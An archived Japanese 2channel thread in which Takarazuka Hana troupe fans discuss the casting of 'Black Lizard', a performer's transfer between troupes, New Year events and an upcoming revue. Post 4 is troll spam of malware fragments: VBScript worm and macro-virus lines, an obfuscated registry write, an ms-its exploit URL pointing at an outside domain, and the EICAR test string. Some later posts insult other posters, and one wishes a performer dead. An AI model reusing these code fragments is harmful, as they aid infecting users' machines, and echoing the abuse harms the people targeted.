2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

花組スレ Part32

1 :名無しさん@花束いっぱい。:2006/12/29(金) 02:18:58 ID:g7q+UbKB
花組について語るスレPart32です。
荒らし・煽りにはスルーでお願いします。
レスした人も同罪です。

新スレは980踏んだ人が立てて下さい。
駄目だった場合は、次の人にお願いしてください。
スレ立てる場合は重複スレ作成防止のため、現スレで宣言してからお願いします。

前スレ 花組スレ Part31
http://hobby8.2ch.net/test/read.cgi/siki/1163576021/

2 :名無しさん@花束いっぱい。:2006/12/29(金) 02:58:50 ID:UUJw4FgF
2ゲット…??
そして1さん、お疲れ様です☆

3 :名無しさん@花束いっぱい。:2006/12/29(金) 12:32:34 ID:iBb/hY5/
1タンありがとん♪
年末だし昼間だしマターリだね。

4 :<body onload=window()>:2006/12/29(金) 14:37:04 ID:RPH4Thuz
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :名無しさん@花束いっぱい。:2006/12/29(金) 20:01:45 ID:Y8y/qcVN
uza

6 :名無しさん@花束いっぱい。:2006/12/29(金) 20:02:34 ID:Y8y/qcVN
uza

7 :名無しさん@花束いっぱい。:2006/12/29(金) 20:04:28 ID:Y8y/qcVN
uza

8 :名無しさん@花束いっぱい。:2006/12/29(金) 20:05:45 ID:Y8y/qcVN
uza

9 :名無しさん@花束いっぱい。:2006/12/30(土) 04:20:11 ID:81FQRsyO
新公だけど、彩音はもう卒業させられるんではないか?

10 :名無しさん@花束いっぱい。:2006/12/30(土) 10:39:40 ID:jT97k7lO
えみくらも新公2回出てたしまだ出るんじゃね?
私としてはトカゲルナみたいなぁ。ルナは男にしておくのもったいない。

11 :名無しさん@花束いっぱい。:2006/12/30(土) 14:24:01 ID:E2QdDCzX
ルナって冴月君の事?ちょww何突然w それはないだろ。
冴月君は男の中の男だよw
ショーで女役は観たいかな。
タキシードの次ぐらいのショーでだいもん・るな他下級生4人ぐらいで真面目な女役は観たくはあるw

12 :名無しさん@花束いっぱい。:2006/12/30(土) 17:24:01 ID:t9EMIVR5
>10
彩城レア?…も、違うかな。

13 :名無しさん@花束いっぱい。:2006/12/30(土) 18:42:24 ID:Q2PMuI72
ルナもレアもアリエナス(´ー`)y-~~

14 :名無しさん@花束いっぱい。:2006/12/30(土) 23:10:57 ID:t3a/y86d
>>13=ID:Q2PMuI72 お子ちゃま張りつきミツルファソ。(85期スレで暴れてますw)↓
てか5期も下の子にケチつけてどうするねん。皆お遊びで言ってるだけで本気で言ってる訳ないだろ。
相変わらずイタタなミツルファソ。

62 :名無しさん@花束いっぱい。:2006/12/30(土) 18:39:21 ID:Q2PMuI72
つか他板でこういう晒しやったら
まずやった方が袋にされる罠


15 :名無しさん@花束いっぱい。:2006/12/30(土) 23:39:35 ID:Q2PMuI72
ケチつけるもなにも娘役トプの役を
男役がやることはほとんどないだろうってことだけなんだが…。

期スレのは個人ブログ晒しは痛いってだけなのに
冬休みは厨房が沸いて迷惑旋盤だ。



16 :名無しさん@花束いっぱい。:2006/12/30(土) 23:45:43 ID:t3a/y86d
張り付き即レスご苦労様です。

17 :名無しさん@花束いっぱい。:2006/12/31(日) 00:31:07 ID:X3d89di9
>15
アフォの相手すんな、ほっとけ


年末にもかかわらずお稽古終了は遅いみたいだね。


18 :名無しさん@花束いっぱい。:2006/12/31(日) 19:25:12 ID:5MZBBBzn
お稽古昨日でおわりっしょ?? んで明けは3日からって。

19 :名無しさん@花束いっぱい。:2006/12/31(日) 20:38:56 ID:X3d89di9
>18
昨日は漏れの贔屓は9時過ぎまでやってたらしい

20 :名無しさん@花束いっぱい。:2006/12/31(日) 23:38:54 ID:Z5GTN4c+
拝賀式には皆さんご出席?

21 : 【大吉】 【183円】 :2007/01/01(月) 03:05:49 ID:nOMaX4a5
花組大好き!

22 : 【ぴょん吉】 【476円】 :2007/01/01(月) 09:40:46 ID:gUe54HKJ
まっつにエトワールなんか回ってきませんように

23 : 【大吉】 【1777円】 :2007/01/01(月) 10:01:54 ID:j6Bjt72o
ぴょん吉ウサタン大好き♪

24 :名無しさん@花束いっぱい。:2007/01/01(月) 10:14:11 ID:dU8DF6G4
ナウオン出演者
春野寿美礼、桜乃彩音、真飛聖、壮一帆、愛音羽麗、桜一花

TAKARAZUKA MUSE#3
レア・くまくまでピアノ

25 :名無しさん@花束いっぱい。:2007/01/01(月) 15:56:16 ID:4TBFwZAS
d!やっぱり、キホの抜けた穴は一花で埋めつつ、
若手を使って様子を見る、って感じなのかなぁ?

26 : 【大吉】 【393円】 :2007/01/01(月) 16:14:07 ID:XoIy2gaE
主な配役    本公演     新人公演
明智小五郎  春野寿美礼  朝夏まなと
黒トカゲ     桜乃彩音   野々すみ花

27 : 【大吉】 【882円】 :2007/01/01(月) 18:04:34 ID:zK/DCFjw
マジで!?
かすが新公主役説はやっぱりガセだったのか・・・

28 :名無しさん@花束いっぱい。:2007/01/01(月) 18:58:10 ID:g0lecFCB
まなとにすみか・・・orz

29 :名無しさん@花束いっぱい。:2007/01/01(月) 19:49:59 ID:d2HefhC0
かすがでなくて、良かったって思うのは
少数派ですか?

30 :名無しさん@花束いっぱい。:2007/01/01(月) 20:44:33 ID:AIKknryY
>>27
いきなり来てそれはない。(他の子や花組ファンの手前)
次だよ>かすが
当然新公主役やらせる為に組替えだもの。

31 :名無しさん@花束いっぱい。:2007/01/01(月) 20:47:49 ID:AIKknryY
>>22
そんな事100%絶対にありえないから安心汁。
ただのまっつファンの妄想・願望だから。

32 :名無しさん@花束いっぱい。:2007/01/01(月) 20:59:06 ID:dU8DF6G4
>26
予想通りっていうか順当ですな。
この分だとヒロインもすみ花かな。

早苗がきらりんだろうなあ。
小林少年はどうするんだろう。
子役専門っぽくなってきてるレアあたり?

33 : 【だん吉】 【339円】 :2007/01/01(月) 21:00:10 ID:Y1c5OItV
あけましておめでとうございます。
今年も宜しくお願い致します。


花組子たちもよい一年すごせますように〜( ー人ー )ナムナム

34 :名無しさん@花束いっぱい。:2007/01/01(月) 21:33:13 ID:7ULAPsN5
ウィルスでみえないage

35 :名無しさん@花束いっぱい。:2007/01/01(月) 21:52:38 ID:mNB+srDZ
新年おめでとうございます。
花組っ子、花組ファンの皆様にとって良き一年でありますように。
鏡開きに行きました。
特別ゲスト・さおたさん、としこちゃん、王子
ゆうくん、まりんちゃん、そうちゃん、まっつ。
おさたんの一気飲みにあっぱれw
でも、なんかあっという間に終わっちゃった〜

36 :名無しさん@花束いっぱい。:2007/01/01(月) 21:57:31 ID:dU8DF6G4
えーっと…それはみわっちはいなかったてことでFA?

37 :名無しさん@花束いっぱい。:2007/01/01(月) 21:59:33 ID:3wntBfUL
メンバーはたまたまいた人かも。
まさにサプライズ参加だったみたいですよ。

38 :名無しさん@花束いっぱい。:2007/01/01(月) 22:03:18 ID:dU8DF6G4
拝賀式に参加したメンバーってことかな
サプライズもたまにはいいね。

39 :名無しさん@花束いっぱい。:2007/01/01(月) 22:34:23 ID:OiigVOiV
>27
それ、どう考えてもガセだし・・・

白鳥って、月で新公で2番手はおろか3番手すらついてなかった生徒だよ?
しかも月ってこのところマミ以降トップは花出身がほとんどっていうぐらいスター育成に・・・な組。
その組出身の、今までその程度の扱いの生徒がいきなり新公主演って・・・ありえなす・・・
今まで異動した先でいきなり新公主演を貰ってた生徒は、少なくとも元の組で新公でトップ3には入ってた。

40 :名無しさん@花束いっぱい。:2007/01/01(月) 22:42:15 ID:SI3kCMAV
勘違いならすみません。
白鳥さん?『暁』でゆうひさんの役ではなかったですか?

41 :名無しさん@花束いっぱい。:2007/01/01(月) 23:12:24 ID:AIKknryY
だから次でやるんだってば>かすが新公主役
決まってる事なんだってば。

42 :名無しさん@花束いっぱい。:2007/01/01(月) 23:30:14 ID:dU8DF6G4
ID:AIKknryYはスルー汁

43 :名無しさん@花束いっぱい。:2007/01/01(月) 23:36:20 ID:d2HefhC0
おさたん、一気しちゃって、酔っぱらってませんでしたか?
なんか、トロンとしたおさたん、
想像しただけで、とってもかわいい。
でも、もしかして、
とっても強くて
全然顔に出ないタイプ?

44 :名無しさん@花束いっぱい。:2007/01/01(月) 23:38:17 ID:Qhy3tlW5
いつものしつこい張り付き厨のID:dU8DF6G4の方がウザイ。
自分の思い通りの話にならなかったら、すぐイライラして八つ当たりが特徴。

45 :名無しさん@花束いっぱい。:2007/01/01(月) 23:43:21 ID:Qhy3tlW5
ねぇ、今日も元旦から一日張り付いて何してるの?>ID:dU8DF6G4
可哀想な人だね・・・晒しあげとくか・・・orz

46 :名無しさん@花束いっぱい。:2007/01/01(月) 23:53:00 ID:N48qvRH1
かすが新公主役を次回昨に廻って来るって!なんで知ってるの?何かの力で勝ち取るの?○○テレビの力てか…で?

47 :名無しさん@花束いっぱい。:2007/01/01(月) 23:55:08 ID:/EtF3+vO
おさ・・・・一気飲み&酔っ払いバロスww


48 :名無しさん@花束いっぱい。:2007/01/02(火) 00:00:56 ID:OiigVOiV
>40
暁はトドが出てたから、ゆうひは4番手。

49 :名無しさん@花束いっぱい。:2007/01/02(火) 00:06:35 ID:QlwphyOh
全ツの扱いがマメ>かすがだったからね

50 :名無しさん@花束いっぱい。:2007/01/02(火) 00:21:51 ID:rgQdmWQT
>41
次で決まってるって・・・
その手の話、大抵ガセだけど・・・

そんなにバック力があるなら月のままで新公主演してたよ>白鳥。
つか、今回新公主演だったと思うが?

51 :名無しさん@花束いっぱい。:2007/01/02(火) 00:28:59 ID:O7nisiPQ
雨宮と波越警部は誰になるだろうね

52 :名無しさん@花束いっぱい。:2007/01/02(火) 00:50:33 ID:VsD8wZCr
>そんなにバック力があるなら月のままで新公主演してたよ>白鳥。

月には同期の龍がいるから無理な事はお忘れ? 他組の事は知らないとか?
他に言ってる人もいるように最後に新公主役させる為の組替えでそ
それ以外に何の為に組替えしてきたのさ?w
いきなりやったら反感買うからだよ、全ツも明智も

53 :名無しさん@花束いっぱい。:2007/01/02(火) 00:58:22 ID:O7nisiPQ
>それ以外に何の為に組替えしてきたのさ?w
ダンサー補充


和はそのまま即新公主役やったよね。
昔ならえりたんもそのまま主役だったね。
本当に路線にさせたくてねじ込むなら
反感買うから次まで待たせるなんて
悠長なことしないと思うが







54 :名無しさん@花束いっぱい。:2007/01/02(火) 01:02:39 ID:YtgGluSJ
>52
50じゃないけど
もうちょっとましな書き方あるんじゃない?
それにかすがが新公主役するにしても
それはまだ先の事だし
絶対にやるかなんて分からないよ。
そんな先の新公の話より今の話したら?

55 :名無しさん@花束いっぱい。:2007/01/02(火) 01:18:49 ID:VsD8wZCr
>>54 何怒ってるの??w


>反感買うから次まで待たせるなんて 悠長なことしないと思うが
今回は様子見って事。次やるのは決まってる。

56 :名無しさん@花束いっぱい。:2007/01/02(火) 01:25:06 ID:XYVjQMfT
かすがってイタイふぁんが居るんだね〜驚いた。
箸にも棒にもかからない、タダのダンサーさんだと思ってましたけどw
存在感ないし…この先も注目するのはイタイ人だけだったりして。

57 :名無しさん@花束いっぱい。:2007/01/02(火) 01:30:47 ID:YtgGluSJ
>55
怒ってるつもりじゃなかったけど
怒ってるようにみえたのならごめんなさい。


でも今の段階で良くそこまで断言できるなとは思いますけど。
かすがって月では微妙〜な路線だったし
月の確実系な路線はまさきとみりお
かすがはわざわざ組替えして路線にのせるほどには見えなかったけど…?
みりおに抜かれてた訳だし。
そのかが抜けてダンサー補充を目的にしたんだと思ってたわ。
長文スマソ



58 :名無しさん@花束いっぱい。:2007/01/02(火) 02:27:56 ID:Ioh0LKxF
>57
ダンサー補充になるほどのダンサーでもないよ>かすが。
あの程度なら他組から貰わなくても、花組に充分いる。

めおもかすがも、月でまさきやマギーやみりおを上げるのに邪魔だから花組に出したって感じ。
不○生徒処理に使われて花組も迷惑だねw

59 :名無しさん@花束いっぱい。:2007/01/02(火) 03:14:56 ID:3WUuyfBL
それだけ、“足りない”って思われてるんでしょΣ( ̄□ ̄;

60 :名無しさん@花束いっぱい。:2007/01/02(火) 03:38:30 ID:LRxKzF5V
かすがチャンてダンサーなのぉ???
全ツ見て、何てモゾモゾと気持ち悪い踊りっぷりのコだろ〜と、
芝居だけのコなんて、花でどうなの?と思ったんだけど。


61 :名無しさん@花束いっぱい。:2007/01/02(火) 10:26:26 ID:3aTtxnTz
>52
誰かがいるために新公一度もできない(捻じ込めない)人が、
わざわざ新公のために花に組替えしないと思うが…
花ってPの考え的にもそういう感じだと思うし。
異動先が花という時点で、諦めろってことかと。
同時にきたもう1人も同じ。
Pにその気があるなら全ツ・DCの扱いはもっと違ったでしょ。

62 :名無しさん@花束いっぱい。:2007/01/02(火) 11:12:15 ID:sCDxmMJw
これぞ花ファンらしい流れですなww

63 :名無しさん@花束いっぱい。:2007/01/02(火) 11:19:51 ID:dqw8BYrl
組替えで入ってくるとご贔屓の扱いがかわってくるあたりの
ファンが戦々恐々としてる感じ。
でもこの中から抜け出してこそのスターに成長するのだからいいよ。
スターになった頃にまた他組へ放出されるだろうけど。

64 :名無しさん@花束いっぱい。:2007/01/02(火) 11:22:28 ID:O7nisiPQ
テレビつけたらいきなりVISAのCMでびっくりした(((( ;゚Д゚)))

65 :名無しさん@花束いっぱい。:2007/01/02(火) 11:25:48 ID:nn6jMY3R
龍は特にカネコネ目立ったものはないけど、新公主役&路線にしたい、しかしかすがのバックが強い、仕方なく新公主役できそうな花に移動。1回くらいやらしときゃ、気が済むだろう。ってなわけで。

66 :名無しさん@花束いっぱい。:2007/01/02(火) 13:00:17 ID:LLEgvUZk
そういえば、みつるの時も始めから主演は1作のみという噂で、
蓋を開ければ本当にまなと→みつるだった。

今回もかすがは1作で、まなと→かすがになるのかな。

でもみつるはバックが強いとは聞いたことないけど。

67 :名無しさん@花束いっぱい。:2007/01/02(火) 13:18:27 ID:1BMZoN9s
龍は性格はともかく、スターらしい華はあるからね
…かすがのバックがそんなに強いのか。

68 :名無しさん@花束いっぱい。:2007/01/02(火) 13:27:30 ID:LLEgvUZk
でも龍って素顔のくりくりお目目が可愛いけれど、
化粧顔は決して男前とは言えないし、実力もあるとは言えないみたいだし、
他組ファンとしては何が売りなのかいまいちわかんね。

花組でいう、みつるみたいなもん?

69 :名無しさん@花束いっぱい。:2007/01/02(火) 14:55:43 ID:q6/BQM8N
みつるには一応、華はあるんでないかい?
壊滅的&破壊的な歌はどうしようもないけど、
集団の中に入れても
ハッと目に付く(良い意味で)オーラがある。
かすがは、正直埋もれてる。

70 :名無しさん@花束いっぱい。:2007/01/02(火) 15:31:36 ID:LLEgvUZk
>>69
ごめん、みつるに例えたのは、龍真咲のこと。

かすがは華があるタイプではないけど、けっこう踊れると思ったよ>全ツ
渋いタイプで、花組にはいないタイプだからいいんでない?

71 :名無しさん@花束いっぱい。:2007/01/02(火) 16:29:57 ID:4iTbDfGN
マサオは結構歌える。
エリザ新公ルドルフとか良かったよ。
月組ではマサオの「俺を観ろーーー!」光線が凄くて
かすがの印象あんまり残ってないや……。
舞台化粧はまっつに似てるよね。


72 :名無しさん@花束いっぱい。:2007/01/02(火) 16:55:37 ID:VlYdYg9s
かすがは全然路線扱いじゃなかったよ、月時代。
スカフェも?だったし、リカさんのお付きだったから
良い位置で踊ったりしてるんだと思ってた。

73 :名無しさん@花束いっぱい。:2007/01/02(火) 18:39:28 ID:JrAojHMN
かすがのファンも痛いちゃんだけど代表も痛いおばちゃんなんだよね!

74 :名無しさん@花束いっぱい。:2007/01/02(火) 20:29:55 ID:q6/BQM8N
痛くないファンしかいない生徒なんて、皆無だと思う。
ついでに、会員その他から信頼され、慕われている代表なんて、
どこにもいない。

75 :名無しさん@花束いっぱい。:2007/01/02(火) 22:22:39 ID:nn6jMY3R
>73
貴方の周りにいないだけでしょ。自分と似た人しか目に入らないのねw

かすがは路線よりオンリーワン的な立場で伸びて欲しい。ふみか系、ちょっと前のアニキ系。

76 :名無しさん@花束いっぱい。:2007/01/02(火) 22:33:35 ID:CS0kj6gJ
>66
みつるの下級生時代からの扱いがバックが強い意外のなにものでもないけど?
植田前理事長系に強い役付きだった。

でなければあの程度の容姿と実力皆無で、あんなにずっと良い役が付いたりしない。
かすがもバックが強いからスカフェでそ?
確かに、新公主演の1回ぐらいはあるかもね。
でもその程度でトップになれる望みは・・・皆無に近いけどw

77 :名無しさん@花束いっぱい。:2007/01/02(火) 22:48:40 ID:LLEgvUZk
>>76
じゃあさ、あの程度の実力でなんでバックが付くの?

78 :名無しさん@花束いっぱい。:2007/01/02(火) 22:51:12 ID:O7nisiPQ
次の新公をお楽しみに…ってことでいーんじゃねーの。

新公、小林少年と早苗が誰になるか激しく気になるなあ

79 :名無しさん@花束いっぱい。:2007/01/02(火) 22:59:01 ID:0tmqPiGy
早苗・・・・初花美咲

80 :名無しさん@花束いっぱい。:2007/01/02(火) 23:10:00 ID:gyKj22fl
>77

実力でバックが付くなんて聞いたことがないけど?
実家のコネとかでバックが付くのがほとんど。



81 :名無しさん@花束いっぱい。:2007/01/02(火) 23:13:59 ID:LLEgvUZk
>>80
実力があったり成績の良い子にはバック付き易いよ。

82 :名無しさん@花束いっぱい。:2007/01/02(火) 23:19:12 ID:O7nisiPQ
>79
それは情報すか、願望すか?

83 :名無しさん@花束いっぱい。:2007/01/02(火) 23:38:03 ID:YtgGluSJ
>76
あの程度の容姿でって…
容姿が売りなんじゃ…
ただたんに下級生の頃から注目されてたような気ガス。
なんでもかんでもカネコネってわけじゃない。
まあどうか分からんけど。

84 :名無しさん@花束いっぱい。:2007/01/03(水) 00:27:06 ID:BKszKkh9
初花さんって研一だっけね

85 :名無しさん@花束いっぱい。:2007/01/03(水) 02:54:27 ID:L9a1muVB
研一にいるらしいね。
自演なんだろうね。

86 :名無しさん@花束いっぱい。:2007/01/03(水) 19:33:00 ID:5dXxUBTg
今日からお稽古再開したね。
今回、お稽古期間短いなぁ。。
花組のみんな、頑張ってねー

87 :名無しさん@花束いっぱい。:2007/01/04(木) 17:49:48 ID:ki+ly4py
新公その他の配役の
ハピョーは、いつですかね?

88 :名無しさん@花束いっぱい。:2007/01/04(木) 21:46:30 ID:8iReb5vJ
ショーの配役はまだ?
オギーの場面割りも気になる。

89 :名無しさん@花束いっぱい。:2007/01/04(木) 21:47:57 ID:RJv1BFrD
はやくて次のグラフでそ、載るの。

90 :名無しさん@花束いっぱい。:2007/01/04(木) 22:25:31 ID:Hoy0Zu72
早く退団して欲しい某男役

91 :名無しさん@花束いっぱい。:2007/01/04(木) 23:55:23 ID:F/CHquWF
園加ちゃんが月で評判がいい。嬉しいです・・・

92 :名無しさん@花束いっぱい。:2007/01/04(木) 23:55:44 ID:i/3K68zx
次の公演は小池先生ですね。もしや春野寿美礼退団か…。

93 :名無しさん@花束いっぱい。:2007/01/05(金) 07:03:46 ID:4pUTzLFZ
あのタイトルでしなかったらおもしろすぎw

94 :名無しさん@花束いっぱい。:2007/01/05(金) 12:44:22 ID:Hx/oFJRb
アデューってタイトルで退団しないのが寿美花様っぽい気もするw

95 :名無しさん@花束いっぱい。:2007/01/05(金) 13:11:23 ID:4pUTzLFZ
それも笑えるね。
何にしてもわらかしてくれるオサって大物だねw

96 :名無しさん@花束いっぱい。:2007/01/05(金) 13:50:37 ID:/C/ZFVPJ
寿美花様CD発売記念アゲ

97 :名無しさん@花束いっぱい。:2007/01/05(金) 16:17:58 ID:JovzXSg1
>93
でも過去にはある。
さようなら〜ってタイトルについてたのにトップは退団しなかった公演が。

98 :名無しさん@花束いっぱい。:2007/01/05(金) 16:23:53 ID:3uAGNMFj
>96
オサさんCD発売するんですか??

99 :名無しさん@花束いっぱい。:2007/01/05(金) 16:55:24 ID:m/nP7c8D
>96 公式に告知が出てますだ。

100 :名無しさん@花束いっぱい。:2007/01/05(金) 17:00:05 ID:3uAGNMFj
>99
ありがとうございます。
公式見てきます。

101 :名無しさん@花束いっぱい。:2007/01/05(金) 17:29:16 ID:m/nP7c8D
99は98さんあてでしたわ。96さんすみません。

102 :名無しさん@花束いっぱい。:2007/01/05(金) 22:15:07 ID:DWHXyYYO
早く氏んだら色基地外男役

103 :& ◆LkfnlKQuZU :2007/01/06(土) 12:06:31 ID:gvKxGu0Q
公演はじまったょね?
いかがですか???
教えてくださぃ!!(人´д`*)”

104 :名無しさん@花束いっぱい。:2007/01/06(土) 12:39:18 ID:FsWyoRb3
はて?

105 :名無しさん@花束いっぱい。:2007/01/07(日) 00:26:39 ID:ahTpaNXm
今日、一花とかすがが大劇前でCSの撮りやってたけど
なんの番組なのかな?

106 :名無しさん@花束いっぱい。:2007/01/07(日) 07:41:47 ID:72hzpzPm
お二人は大劇場前にいたけど、キャトルにもカフェテラスにも入ってきた。
お店を紹介してる感じでした。


107 :名無しさん@花束いっぱい。:2007/01/07(日) 12:46:31 ID:w8styEVx
花組もりあがらないね

108 :名無しさん@花束いっぱい。:2007/01/07(日) 13:44:41 ID:MtJX5lL7
配役みた途端テンション下がったぉ

109 :名無しさん@花束いっぱい。:2007/01/08(月) 21:02:17 ID:Q+Bs7Xw6
書生と浮浪児ばっかりで萌えられません。

110 :名無しさん@花束いっぱい。:2007/01/08(月) 21:42:29 ID:93/oJo5U
モブだね、モブ…

贔屓よ、心を強く持て! まて次回(次作)!

111 :名無しさん@花束いっぱい。:2007/01/08(月) 22:31:46 ID:Pq1axzNU
黒蜥蜴、期待してるんだけどなあ。
通うつもりで、いっぱいチケット買ったんだけど。
あやねちゃんもやってくれると信じてるんだけど
少数派なんだよね、私。

112 :名無しさん@花束いっぱい。:2007/01/08(月) 22:36:49 ID:Bu4F600V
>>111 うん…

113 :名無しさん@花束いっぱい。:2007/01/08(月) 22:48:17 ID:riKBxDc9
彩音ちゃんが化けてくれると私は信じてるよ、私は。

114 :名無しさん@花束いっぱい。:2007/01/08(月) 23:51:05 ID:HLIHALPN
私も信じてる!!花組のみんなは、いつもいい意味で
裏切ってくれるから♪

115 :名無しさん@花束いっぱい。:2007/01/08(月) 23:52:42 ID:70hrO5Rj
ごめん・・・彩音ちゃんを信じていない訳じゃない。
花組生も信じてる。
だけど・・・キムシンは全く信じてない。

なのでオギーを信じて通います・・・

116 :名無しさん@花束いっぱい。:2007/01/09(火) 00:00:24 ID:cYczfllC
>115
あなたは私ですか

117 :名無しさん@花束いっぱい。:2007/01/09(火) 00:06:30 ID:69Ql6gv5
不確定情報

燕尾がいっぱい…かもしれない>ショー

118 :名無しさん@花束いっぱい。:2007/01/09(火) 00:14:09 ID:SvzjjRxZ
それは、期待しちゃっていいのかしらん?

119 :名無しさん@花束いっぱい。:2007/01/09(火) 00:17:05 ID:03glAdjb
みんな、タキシードと燕尾は違うよ!
タキシードに尻尾は付いていないよ。

120 :名無しさん@花束いっぱい。:2007/01/09(火) 00:17:47 ID:SvzjjRxZ
ありゃ?タイトル「タキシード・ジャズ」よね?

121 :名無しさん@花束いっぱい。:2007/01/09(火) 00:41:18 ID:Ck7gbn/I
>119
どっちでもいいよ。
アイ・ガッチャの男役祭りのがタキシード。
ファントムフィナーレは変わり燕尾だったと思うけど
ジブンが好きなのはアイガッチャの方。

要は音楽と振り付けその他の演出の手腕が大事。
人は知らないけど、ジブンはオギーで外れた!と思ったことがないのでオギーは信じてる。

122 :名無しさん@花束いっぱい。:2007/01/09(火) 01:24:46 ID:LL5fJWAx
オープニングに花道から銀橋まで男役勢揃いらしい。


123 :名無しさん@花束いっぱい。:2007/01/09(火) 15:38:49 ID:/doyCubK
>122
マジデ… (*´Д`)・∵. ブーッ!!

124 :名無しさん@花束いっぱい。:2007/01/09(火) 18:23:14 ID:69Ql6gv5
花組の真髄キタ━━━━(゚∀゚)━━━━!!!!

125 :名無しさん@花束いっぱい。:2007/01/09(火) 19:27:33 ID:UPCY58Ip
> 122
情報トン!

オギーってそういうことしなさそうって勝手に思ってた。
チョト嬉しいどんす♪

126 :名無しさん@花束いっぱい。:2007/01/09(火) 19:47:46 ID:lTGCoSa8
また出たしゃべりなファソ。暇な代表かな?w
ナルの退団といい、代表か生徒っぽい書き込み多いよね。
腐ってるな、最近の花組。

127 :名無しさん@花束いっぱい。:2007/01/09(火) 19:55:44 ID:69Ql6gv5
>124
デビュー作パッサージュは
プロローグで男役ズラリだよ

128 :名無しさん@花束いっぱい。:2007/01/09(火) 19:56:06 ID:vKlfhSIP
>>126はどういう立場の人間なのかな?
ただのファンなら情報出たら嬉しいだけでそんな発想にならないはずだけどね。

129 :名無しさん@花束いっぱい。:2007/01/09(火) 19:57:14 ID:69Ql6gv5
>128

荒らし・煽りにはスルーでお願いします。
レスした人も同罪です。


130 :名無しさん@花束いっぱい。:2007/01/09(火) 20:07:09 ID:lTGCoSa8
情報ベラベラ嬉しそうにネットに書き込む方がよっぽど荒らしだろ。
劇団にそろそろ24だな。

131 :名無しさん@花束いっぱい。:2007/01/09(火) 20:12:01 ID:SMo1BDmX
このスレも書き込みできない状態だよね。
変なのが粘着に居座ってて。
スレストップ状態。
せっかく書き込みあってもこれだもんね。

132 :名無しさん@花束いっぱい。:2007/01/09(火) 20:20:31 ID:JCcAyro0
>127
そういえば、パッサージュは中詰めも、男役勢揃いの確か黒エンビでの群舞があったキガス

133 :名無しさん@花束いっぱい。:2007/01/09(火) 20:24:55 ID:69Ql6gv5
>132
中詰はシルバーのジャケットにピンクのひらひらシャツじゃなかった?
ラビアンローズ歌ってた気がするんだが…


134 :名無しさん@花束いっぱい。:2007/01/09(火) 21:10:10 ID:hi2KZXPd
新公その他の配役まだかな…いつもいつ頃だっけ?

135 :名無しさん@花束いっぱい。:2007/01/10(水) 07:21:47 ID:PyMFuVyY
男役ずらりwktk

136 :名無しさん@花束いっぱい。:2007/01/11(木) 00:14:12 ID:WJB3/ltt
オギーはいい仕事してくれますか?
花組との相性はよさげですか?
神に祈る気持ちです。
毎週末、通うんです。

137 :名無しさん@花束いっぱい。:2007/01/11(木) 00:16:17 ID:KPGlO+3V
オギーはいい仕事をする人だ
花組との相性はマラケシュ見る限りよい
本公→博多の役替り、アテガキは見事であった

138 :名無しさん@花束いっぱい :2007/01/11(木) 00:29:08 ID:/4C7/pCG
なんか このスレ シラケテル
しかたないさ
トカゲあやねじゃあ
文句言おうよ 劇団に

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)